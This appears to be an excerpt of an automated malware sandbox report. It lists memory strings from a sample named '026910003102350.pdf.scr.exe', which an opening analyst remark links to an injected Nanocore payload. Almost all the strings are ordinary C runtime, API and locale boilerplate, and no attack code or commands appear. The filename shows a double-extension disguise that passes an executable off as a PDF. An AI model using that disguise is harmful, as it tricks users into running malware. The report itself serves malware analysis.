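Run against the full evidence block rather than the embedded subset, the `review` bucket is what remains after the SFX and CRT boilerplate is stripped; on this region it shrinks to a handful of dynamically resolved API names and locale tables, which is consistent with the region being the SFX stub's own image rather than the injected Nanocore payload.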
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ole32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: fole32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: acquiresrwlockexclusive
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: releasesrwlockexclusive
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: shlwapi.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: comctl32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: kernel32.dllacquiresrwlockexclusivereleasesrwlockexclusiveshlwapi.dllcomctl32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: bad array new length
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: bad array new length@
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: <5ikq
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: bad exception
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __based(
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __cdecl
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __pascal
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __stdcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __thiscall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __fastcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __vectorcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __clrcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __eabi
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __swift_1
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __swift_2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __swift_3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __ptr64
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __restrict
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __unaligned
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: restrict(
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: delete
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: operator
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `vftable'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `vbtable'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `vcall'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `typeof'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `local static guard'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `string'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `vbase destructor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `vector deleting destructor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `default constructor closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `scalar deleting destructor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `vector constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `vector destructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `vector vbase constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `virtual displacement map'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `eh vector constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `eh vector destructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `eh vector vbase constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `copy constructor closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `udt returning'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `rtti
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `local vftable'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `local vftable constructor closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: new[]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: delete[]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `omni callsig'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `placement delete closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `placement delete[] closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `managed vector constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `managed vector destructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `eh vector copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `eh vector vbase copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `dynamic initializer for '
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `dynamic atexit destructor for '
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `vector copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `vector vbase copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `managed vector copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `local static thread guard'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: operator ""
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: operator co_await
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: operator<=>
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: type descriptor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: base class descriptor at (
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: base class array'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: class hierarchy descriptor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: complete object locator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `anonymous namespace'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: __based(__cdecl__pascal__stdcall__thiscall__fastcall__vectorcall__clrcall__eabi__swift_1__swift_2__swift_3__ptr64__restrict__unalignedrestrict( new delete=>><<!==!=[]operator->*++---+&->*/%<<=>>=,()~^|&&||*=+=-=/=%=>>=<<=&=|=^=`vftable'`vbtable'`vcall'`typeof'`local static guard'`string'`vbase destructor'`vector deleting destructor'`default constructor closure'`scalar deleting destructor'`vector constructor iterator'`vector destructor iterator'`vector vbase constructor iterator'`virtual displacement map'`eh vector constructor iterator'`eh vector destructor iterator'`eh vector vbase constructor iterator'`copy constructor closure'`udt returning'`eh`rtti`local vftable'`local vftable constructor closure' new[] delete[]`omni callsig'`placement delete closure'`placement delete[] closure'`managed vector constructor iterator'`managed vector destructor iterator'`eh vector copy constructor iterator'`eh vector vbase copy constructor iterator'`dynamic initializer for '`dynamic atexit destructor for '`vector copy constructor iterator'`vector vbase copy constructor iterator'`managed vector copy constructor iterator'`local static thread guard'operator "" operator co_awaitoperator<=> type descriptor' base class descriptor at ( base class array' class hierarchy descriptor' complete object locator'`anonymous namespace'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: <pi-ms-win-core-fibers-l1-1-1<pi-ms-win-core-synch-l1-2-0api-ms-
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: flsalloc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: flsfree
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: flsgetvalue
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: flssetvalue
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: initializecriticalsectionex
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ( 8px
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 50p( 8px
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 700wp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `h````
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: xpxxxx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: `h````xpxxxx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: (null)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: (null)(null)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: corexitprocess
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: mscoree.dllcorexitprocess`
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: nan(snan)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: nan(snan)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: nan(ind)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: nan(ind)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: e+000
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: sunday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: monday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: tuesday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: wednesday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: thursday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: friday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: saturday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: january
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: february
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: march
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: april
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: august
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: september
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: october
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: november
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: december
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: mm/dd/yy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: dddd, mmmm dd, yyyy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: hh:mm:ss
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: infinfnannannan(snan)nan(snan)nan(ind)nan(ind)e+000sunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:sssunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:ssen-us g
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ((((( h
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: (
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: api-ms-win-appmodel-runtime-l1-1-1<pi-ms-win-core-datetime-l1-1-1<pi-ms-win-core-fibers-l1-1-1<pi-ms-win-core-file-l2-1-1<pi-ms-win-core-localization-l1-2-1<pi-ms-win-core-localization-obsolete-l1-2-0<pi-ms-win-core-processthreads-l1-1-2<pi-ms-win-core-string-l1-1-0<pi-ms-win-core-synch-l1-2-0<pi-ms-win-core-sysinfo-l1-2-1<pi-ms-win-core-winrt-l1-1-0<pi-ms-win-core-xstate-l2-1-0api-ms-win-rtcore-ntuser-window-l1-1-0api-ms-win-security-systemfunctions-l1-1-0ext-ms-win-kernel32-package-current-l1-1-0ext-ms-win-ntuser-dialogbox-l1-1-0ext-ms-win-ntuser-windowstation-l1-1-0advapi32kernel32user32
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: getcurrentpackageid
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: lcmapstringex
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: localenametolcid
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ja-jpzh-cnko-krzh-twuk
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: k#cd8l2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: [aoni*{
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: elk(w
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ~ $s%r
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: @b;zo]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: iu+-,
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: obwq4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: v2!l.2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ^<v7w
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 1#inf
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 1#qnan
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 1#snan
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 1#ind
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ;01#inf1#qnan1#snan1#ind
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: arbgcazh-chscsdadeelenesfifrhehuisitjakonlnoplptroruhrsksqsvthtruridbesletlvltfavihyazeumkafkafohimskkkyswuzttpagutateknmrsamnglkoksyrdivar-sabg-bgca-escs-czda-dkde-deel-grfi-fifr-frhe-ilhu-huis-isit-itnl-nlnb-nopl-plpt-brro-roru-ruhr-hrsk-sksq-alsv-seth-thtr-trur-pkid-iduk-uabe-bysl-siet-eelv-lvlt-ltfa-irvi-vnhy-amaz-az-latneu-esmk-mktn-zaxh-zazu-zaaf-zaka-gefo-fohi-inmt-mtse-noms-mykk-kzky-kgsw-keuz-uz-latntt-rubn-inpa-ingu-inta-inte-inkn-inml-inmr-insa-inmn-mncy-gbgl-eskok-insyr-sydiv-mvquz-bons-zami-nzar-iqde-chen-gbes-mxfr-beit-chnl-benn-nopt-ptsr-sp-latnsv-fiaz-az-cyrlse-sems-bnuz-uz-cyrlquz-ecar-egzh-hkde-aten-aues-esfr-casr-sp-cyrlse-fiquz-pear-lyzh-sgde-luen-caes-gtfr-chhr-basmj-noar-dzzh-mode-lien-nzes-crfr-lubs-ba-latnsmj-sear-maen-iees-pafr-mcsr-ba-latnsma-noar-tnen-zaes-dosr-ba-cyrlsma-sear-omen-jmes-vesms-fiar-yeen-cbes-cosmn-fiar-syen-bzes-pear-joen-ttes-arar-lben-zwes-ecar-kwen-phes-clar-aees-uyar-bhes-pyar-qaes-boes-sves-hnes-nies-przh-chtsrx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: paf-zaar-aear-bhar-dzar-egar-iqar-joar-kwar-lbar-lyar-maar-omar-qaar-saar-syar-tnar-yeaz-az-cyrlaz-az-latnbe-bybg-bgbn-inbs-ba-latnca-escs-czcy-gbda-dkde-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ares-boes-cles-coes-cres-does-eces-eses-gtes-hnes-mxes-nies-paes-pees-pres-pyes-sves-uyes-veet-eeeu-esfa-irfi-fifo-fofr-befr-cafr-chfr-frfr-lufr-mcgl-esgu-inhe-ilhi-inhr-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inkok-inko-krky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-bnms-mymt-mtnb-nonl-benl-nlnn-nons-zapa-inpl-plpt-brpt-ptquz-boquz-ecquz-pero-roru-rusa-inse-fise-nose-sesk-sksl-sisma-nosma-sesmj-nosmj-sesmn-fisms-fisq-alsr-ba-cyrlsr-ba-latnsr-sp-cyrlsr-sp-latnsv-fisv-sesw-kesyr-syta-inte-inth-thtn-zatr-trtt-ruuk-uaur-pkuz-uz-cyrluz-uz-latnvi-vnxh-zazh-chszh-chtzh-cnzh-hkzh-mozh-sgzh-twzu-za
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: log10
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 0log10
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ?0c0c
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: loglog10exppowasinacossqrt
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 9=@$"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ?5wg4p
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: bc .=
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: bc .=0
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: <(lx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: #{ =`~r=
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: %s#[k
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: "b <1=
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: #.x'=
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: #.x'=hbo
